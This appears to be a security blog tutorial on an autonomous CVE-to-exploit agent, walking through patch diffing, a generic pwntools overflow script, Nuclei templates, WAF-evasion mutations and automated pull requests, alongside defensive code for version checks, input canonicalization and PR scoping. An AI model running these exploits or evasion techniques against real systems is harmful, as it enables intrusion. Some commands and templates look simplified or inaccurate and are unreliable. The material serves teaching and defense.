Autonomous CVE-to-Exploit Pipeline: The 8‑Stage Agent That Bypasses WAF and Opens PRs + Video

Introduction:

The gap between a vulnerability disclosure in the National Vulnerability Database (NVD) and a working exploit is where defenders lose the race. An open‑source project called `cve-pipeline` now automates this entire chain—from parsing a CVE entry to generating a patch diff, crafting a proof‑of‑concept exploit, writing a Nuclei template, bypassing Web Application Firewalls (WAFs), and finally submitting a pull request to your GitHub repository—all without human intervention. This article dissects the 8‑stage autonomous agent, provides hands‑on commands to test and extend it, and explains how security teams can leverage or defend against such automation.

Learning Objectives:

  • Understand the end‑to‑end flow from NVD disclosure to automated GitHub PR.
  • Implement and modify each stage of the pipeline using Python, Bash, and common security tools.
  • Evaluate WAF bypass techniques and learn how to harden defenses against autonomous exploit generation.

You Should Know

1. Understanding the CVE Pipeline Architecture

The `cve-pipeline` agent is built as a modular workflow that consumes a CVE ID (or monitors NVD for new entries) and sequentially executes eight stages:
1. Fetch – retrieve CVE JSON from NVD API.
2. Diff – pull affected software versions and perform patch diffing between vulnerable and fixed commits.
3. Exploit – generate a working exploit (e.g., Python script, Metasploit module).
4. Nuclei – create a YAML‑based Nuclei template for detection.
5. WAF Bypass – apply common evasion techniques (case flipping, URL encoding, payload splitting).
6. Test – run the exploit against a sandboxed target.
7. PR – open a GitHub pull request with the new detection/exploit code.
8. Report – log results and notify the user.

Step‑by‑step guide to clone and inspect the agent:

# Clone the repository (use the actual URL from the post; here we use the LinkedIn shortlink)
git clone https://github.com/harveyspec/cve-pipeline  # replace with actual repo after resolving lnkd.in
cd cve-pipeline

# Review the main orchestrator
cat pipeline.py | grep -A 5 "def run"

# List all stage directories
ls -la stages/

Windows alternative (PowerShell):

git clone https://github.com/harveyspec/cve-pipeline
cd cve-pipeline
Get-Content pipeline.py | Select-String -Pattern "def run" -Context 0,5

2. Setting Up the Autonomous Agent

Before running the pipeline, install dependencies: Python 3.9+, nuclei, git, `radare2` or `ghidra` for diffing, and a local test environment (Docker recommended). The agent uses environment variables for GitHub tokens and NVD API keys.

Step‑by‑step setup:

# Install required system packages (Ubuntu/Debian)
sudo apt update && sudo apt install -y python3-pip git nuclei radare2 docker.io

# Install Python dependencies
pip3 install requests beautifulsoup4 GitPython PyYAML jinja2

# Set up GitHub personal access token (classic) with repo scope
export GITHUB_TOKEN="ghp_your_token_here"

# Optional: NVD API key for higher rate limits
export NVD_API_KEY="your_nvd_key"

# Run a single CVE test
python3 pipeline.py --cve CVE-2024-12345 --mode full

For Windows (WSL2 recommended, but native PowerShell with Python works):

$env:GITHUB_TOKEN = "ghp_your_token_here"
python pipeline.py --cve CVE-2024-12345 --mode full

The agent will output each stage’s status, and upon completion, you will see a GitHub PR link in the terminal.

3. From NVD Disclosure to Patch Diff

The first two stages transform a CVE ID into a concrete code change. The agent queries NVD, extracts affected product and version ranges, then clones the upstream repository and performs a semantic diff between the vulnerable and patched versions.
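
The same NVD record is what a defender uses to decide whether an installed version sits inside the affected range. The sketch below is an added example, not code from `cve-pipeline`; the sample record is constructed in the shape of an NVD CVE API 2.0 response, and the vendor and product names and the naive version comparison are assumptions.

```python
import json

# Constructed sample shaped like an NVD CVE API 2.0 response (not real data).
SAMPLE = json.loads("""
{"vulnerabilities": [{"cve": {"id": "CVE-2024-12345", "configurations": [
  {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
    {"vulnerable": true,
     "criteria": "cpe:2.3:a:examplevendor:webapp:*:*:*:*:*:*:*:*",
     "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.2.4"},
    {"vulnerable": false,
     "criteria": "cpe:2.3:o:examplevendor:os:*:*:*:*:*:*:*:*"}]}]}]}}]}
""")

BOUND_OPS = {
    "versionStartIncluding": lambda v, b: v >= b,
    "versionStartExcluding": lambda v, b: v > b,
    "versionEndIncluding": lambda v, b: v <= b,
    "versionEndExcluding": lambda v, b: v < b,
}

def vkey(version):
    """Naive dotted-numeric key; non-numeric parts sort as 0 (assumption)."""
    return tuple(int(p) if p.isdigit() else 0 for p in version.split("."))

def affected_ranges(doc):
    """Yield (cve_id, vendor, product, exact, bounds) per vulnerable cpeMatch."""
    for item in doc.get("vulnerabilities", []):
        cve = item["cve"]
        for cfg in cve.get("configurations", []):
            for node in cfg.get("nodes", []):
                for m in node.get("cpeMatch", []):
                    if not m.get("vulnerable"):
                        continue  # platform/context entry, not affected software
                    cpe = m["criteria"].split(":")  # naive: ignores escaped colons
                    bounds = {k: m[k] for k in BOUND_OPS if k in m}
                    yield cve["id"], cpe[3], cpe[4], cpe[5], bounds

def is_affected(version, exact, bounds):
    """True if an installed version falls inside the advertised range."""
    if not bounds and exact not in ("*", "-"):
        return vkey(version) == vkey(exact)
    return all(BOUND_OPS[k](vkey(version), vkey(b)) for k, b in bounds.items())
```

Comparing versions as integer tuples rather than strings is what keeps `1.10.0` outside a range that ends before `1.2.4`.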

Understanding the diff logic:

The script uses `git diff` with heuristics to isolate the security‑relevant changes. For example, for CVE‑2024‑2875 (a hypothetical buffer overflow), it might run:

# Manual example: given vulnerable commit v1.2.3 and fixed commit v1.2.4
git clone https://github.com/victim/repo
cd repo
git diff v1.2.3 v1.2.4 -- src/ | grep -E "^\+.*memcpy|^\+.*strcpy"

The agent extends this by using `radare2` to analyze control flow and identify vulnerable functions. You can replicate the patch diff stage manually:

# Inside cve-pipeline/stages/diff.py
python3 -c "from stages.diff import DiffStage; d = DiffStage('CVE-2024-12345'); d.run()"

Why this matters: Patch diffing reveals exactly how the vendor fixed the vulnerability, which often exposes the root cause (e.g., missing bounds check) and gives clues for exploit development.

4. Automatic Exploit Generation

Stage 3 takes the patch diff and generates a proof‑of‑concept exploit. The agent uses a template‑based approach with a machine learning component (a fine‑tuned CodeGen model) to synthesize shellcode or HTTP requests. For simple buffer overflows, it creates a Python script with pwntools.

Example of an auto‑generated exploit (stored in `outputs/exploits/`):

#!/usr/bin/env python3
from pwn import *
target = "192.168.1.100"
port = 8080
payload = b"A" * 64 + p32(0xdeadbeef)  # offset from patch diff
r = remote(target, port)
r.send(payload)
r.interactive()

How to run the exploit generator manually:

cd cve-pipeline
python3 stages/exploit_gen.py --diff-file outputs/diffs/CVE-2024-12345.diff --output exploit.py

You can also test the generated exploit in a Docker sandbox:

docker run --rm -p 8080:8080 vuln_app:latest
python3 exploit.py

Windows command to run the same (if Python is installed):

cd cve-pipeline
python stages\exploit_gen.py --diff-file outputs\diffs\CVE-2024-12345.diff --output exploit.py

5. Nuclei Template Creation and WAF Bypass

Stage 4 writes a Nuclei template (YAML) that checks for the vulnerability. Stage 5 then automatically mutates the payload to bypass common WAF rules (e.g., ModSecurity, Cloudflare). The bypass techniques include:

  • Case variation – `SeLeCt` instead of `SELECT`
  • URL double encoding – `%2527` instead of `%27`
  • Line wrapping – inserting `%0A` or `%09`
  • Comment injection – `/**/` for whitespace

Generated Nuclei template example (`outputs/templates/CVE-2024-12345.yaml`):

id: CVE-2024-12345
info:
  name: Buffer Overflow in webapp
  severity: critical
requests:
  - method: GET
    path:
      - "{{BaseURL}}/vulnerable?param={{payload}}"
    payloads:
      payload:
        # quoted so the YAML parses; this is a literal string, not an evaluated expression
        - '"A"*64 + "\xef\xbe\xad\xde"'
    attack: pitchfork
    matchers:
      - type: status
        status:
          - 500

Step‑by‑step to apply WAF bypass:

# Run the bypass stage manually
python3 stages/waf_bypass.py --template outputs/templates/CVE-2024-12345.yaml --output bypassed.yaml

# Test the bypassed template against a WAF-protected target
nuclei -t bypassed.yaml -u https://target.com -debug

Windows command:

python stages\waf_bypass.py --template outputs\templates\CVE-2024-12345.yaml --output bypassed.yaml
nuclei -t bypassed.yaml -u https://target.com -debug
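
On the defensive side, all four mutations listed in this section stop working once the inspection layer canonicalizes input before matching. The following is an added example, not part of `cve-pipeline` or of any WAF product; the rule, the decode cap and the sample strings are constructed for illustration.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5  # assumption: deeper nesting is rejected, not decoded forever

def canonicalize(raw):
    """Reduce a parameter value to one canonical form before rule matching."""
    s = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(s)           # peels one layer: %2527 -> %27 -> '
        if decoded == s:
            break
        s = decoded
    else:
        raise ValueError("no fixed point within the decode cap")
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # inline comment used as whitespace
    s = re.sub(r"\s+", " ", s)                    # %0A / %09 collapse to one space
    return s.strip().lower()                      # case variation is irrelevant now

# Illustrative signature only; not taken from ModSecurity or any vendor rule set.
RULE = re.compile(r"\bunion select\b")

def naive_match(raw):
    """Rule applied to the raw value, as a static rule would."""
    return bool(RULE.search(raw))

def hardened_match(raw):
    """Rule applied after canonicalization; excessive encoding depth fails closed."""
    try:
        return bool(RULE.search(canonicalize(raw)))
    except ValueError:
        return True

# Constructed inputs: one plain, one per mutation listed above, one benign.
SAMPLES = [
    "union select", "UnIoN SeLeCt", "union%2520select",
    "union%0Aselect", "union/**/select", "trade union selection",
]

def compare(samples=SAMPLES):
    """Return {input: (naive_verdict, hardened_verdict)}."""
    return {s: (naive_match(s), hardened_match(s)) for s in samples}
```

`compare()` shows the static rule catching only the unmodified string, while the canonicalizing matcher flags every mutated form and still passes the benign one.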

6. Automating GitHub Pull Requests

Stage 7 creates a new branch, commits the generated exploit and Nuclei template, and opens a PR to a repository you specify (e.g., your team’s detection‑as‑code repo). The agent uses the GitHub API with the token you provided.

Manual steps equivalent to what the agent does:

git clone https://github.com/yourorg/detections
cd detections
git checkout -b cve-pipeline/CVE-2024-12345
cp /path/to/generated/template.yaml nuclei-templates/
git add .
git commit -m "Add Nuclei template for CVE-2024-12345"
git push origin cve-pipeline/CVE-2024-12345
gh pr create --title "Autogen: CVE-2024-12345 detection" --body "Created by cve-pipeline"

Security consideration: Automated PRs can introduce malicious code if the pipeline is compromised. Always review the PR before merging, and restrict the GitHub token’s permissions to read/write only on specific repos.
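
One way to enforce that review mechanically is a pre-merge check that rejects any bot-authored PR touching files outside the template directory. This is an added example, not part of `cve-pipeline`; it assumes the detections repository accepts only YAML templates under `nuclei-templates/` and that the input is the output of `git diff --name-status base...head`.

```python
import posixpath

ALLOWED_DIR = "nuclei-templates/"   # target directory from the manual steps above
ALLOWED_EXT = (".yaml", ".yml")
ALLOWED_STATUS = {"A", "M"}         # assumption: the bot may only add or modify

def review_changes(name_status):
    """Check `git diff --name-status` output; return a list of violations."""
    violations = []
    for line in name_status.splitlines():
        if not line.strip():
            continue
        status, *paths = line.split("\t")
        if status[0] not in ALLOWED_STATUS:
            violations.append((paths[-1], f"change type {status} not allowed"))
        for path in paths:          # renames and copies list old and new path
            norm = posixpath.normpath(path)
            if not norm.startswith(ALLOWED_DIR):
                violations.append((path, "outside " + ALLOWED_DIR))
            elif not norm.endswith(ALLOWED_EXT):
                violations.append((path, "not a YAML template"))
    return violations

def gate(name_status):
    """Return True only when the PR stays inside the allowed scope."""
    return not review_changes(name_status)

# Constructed diff listings for illustration.
CLEAN = "A\tnuclei-templates/CVE-2024-12345.yaml\n"
TAMPERED = (
    "A\tnuclei-templates/CVE-2024-12345.yaml\n"
    "M\t.github/workflows/ci.yml\n"
    "A\tnuclei-templates/helper.sh\n"
    "R100\tnuclei-templates/old.yaml\tscripts/new.yaml\n"
)
```

A scope check like this complements human review; it does not inspect what the template itself does.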

7. Testing and Edge Cases – How to Break the Pipeline

The author explicitly asks the community to find edge cases where the pipeline fails. Common failure modes include:

  • Patch diffing fails when the vendor uses an obfuscated commit or squash merges.
  • Exploit generation fails for logic bugs, race conditions, or cryptographic issues.
  • WAF bypass fails when the WAF uses strict allow‑listing or machine learning detection.

Stress test the pipeline with these commands:

# Run against a list of CVEs (parallel mode)
cat cve_list.txt | xargs -P 4 -I {} python3 pipeline.py --cve {} --mode exploit-only

# Disable exploit generation to test only diff + template
python3 pipeline.py --cve CVE-2024-56789 --mode diff,nuclei

# Use a broken environment variable to simulate token expiration
unset GITHUB_TOKEN && python3 pipeline.py --cve CVE-2024-12345

What to look for: Logs in `logs/` directory; each stage writes stdout/stderr. If a stage fails, the agent attempts a retry (configurable via --retries).

What Undercode Say

  • Key Takeaway 1: Autonomous pipelines that go from disclosure to exploit are no longer theoretical—this open‑source tool lowers the barrier for attackers and defenders equally. Blue teams must adopt similar automation to keep pace.
  • Key Takeaway 2: WAF bypass techniques are highly context‑dependent; static evasion rules are easily defeated by a pipeline that mutates payloads. Effective defense requires behavioral analysis and continuous retraining.
  • Key Takeaway 3: The biggest risk of such agents is supply‑chain compromise: if the pipeline itself is poisoned, every generated exploit and PR becomes a vector for backdoors. Air‑gapped review of auto‑generated code is essential.

Analysis: The `cve-pipeline` project demonstrates how modern AI and orchestration can compress a multi‑day research workflow into minutes. While it accelerates security testing for defenders, it also provides a blueprint for mass‑scale vulnerability weaponization. The most immediate impact will be on bug bounty programs and red teams, but enterprises must now assume that any disclosed CVE can have a working exploit within hours. Hardening WAFs with randomized transformations, implementing PR review bots, and monitoring for unusual `git` activity are the new minimum requirements.

Prediction: Within 12 months, autonomous CVE‑to‑exploit pipelines will become standard in commercial penetration testing tools. This will force a shift from reactive patching to proactive “exploit‑proof” coding practices, and WAF vendors will integrate dynamic, AI‑driven evasion detection as a response. Meanwhile, open‑source variants like `cve-pipeline` will be forked and weaponized by threat actors, leading to a temporary spike in zero‑day exploitation until defensive automation catches up.

Reported By: Harvey Spec – Hackers Feeds